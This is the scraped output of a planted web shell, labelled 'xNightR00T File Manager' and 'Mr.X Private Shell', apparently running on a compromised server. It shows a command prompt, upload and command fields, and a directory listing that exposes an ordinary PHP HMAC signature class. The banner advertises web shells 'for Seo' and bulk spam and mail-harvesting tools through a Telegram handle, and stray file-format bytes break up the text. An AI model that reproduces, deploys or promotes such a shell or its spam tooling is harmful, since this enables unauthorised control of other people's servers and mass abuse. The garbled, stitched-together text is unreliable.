xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace WebAPI;

class SignatureGenerator
{
    /**
     * @var string
     */
    private $date = '';

    /**
     * @var string
     */
    private $userAgent = '';

    /**
     * @var string
     */
    private $host = '';

    /**
     * @var string
     */
    private $requestUri = '';

    /**
     * @return string
     */
    public function getRequestUri()
    {
        return $this->requestUri;
    }

    /**
     * @return string
     */
    public function getDate()
    {
        return $this->date;
    }

    /**
     * @return string
     */
    public function getUserAgent()
    {
        return $this->userAgent;
    }

    /**
     * @return string
     */
    public function getHost()
    {
        return $this->host;
    }

    /**
     * @param string $requestUri
     * @return SignatureGenerator
     */
    public function setRequestUri($requestUri)
    {
        $this->requestUri = $requestUri;
        return $this;
    }

    /**
     * @param string $date
     * @return SignatureGenerator
     */
    public function setDate($date)
    {
        $this->date = $date;
        return $this;
    }

    /**
     * @param string $userAgent
     * @return SignatureGenerator
     */
    public function setUserAgent($userAgent)
    {
        $this->userAgent = $userAgent;
        return $this;
    }

    /**
     * @param string $host
     * @return SignatureGenerator
     */
    public function setHost($host)
    {
        $this->host = $host;
        return $this;
    }

    /**
     * @param string $seed
     * @return string
     */
    public function generate($seed)
    {
        $concatString = $this->host.':'.$this->requestUri.':'.$this->userAgent.':'.$this->date;
        return hash_hmac('sha256', $concatString, $seed);
    }
}

Filemanager

Name Type Size Permission Actions
Authentication Folder 0755
Controller Folder 0755
Db Folder 0755
Forms Folder 0755
Mvc Folder 0755
Validator Folder 0755
View Folder 0755
Exception.php File 4.88 KB 0644
SignatureGenerator.php File 1.75 KB 0644
WebapiRequestCreatorInterface.php File 200 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1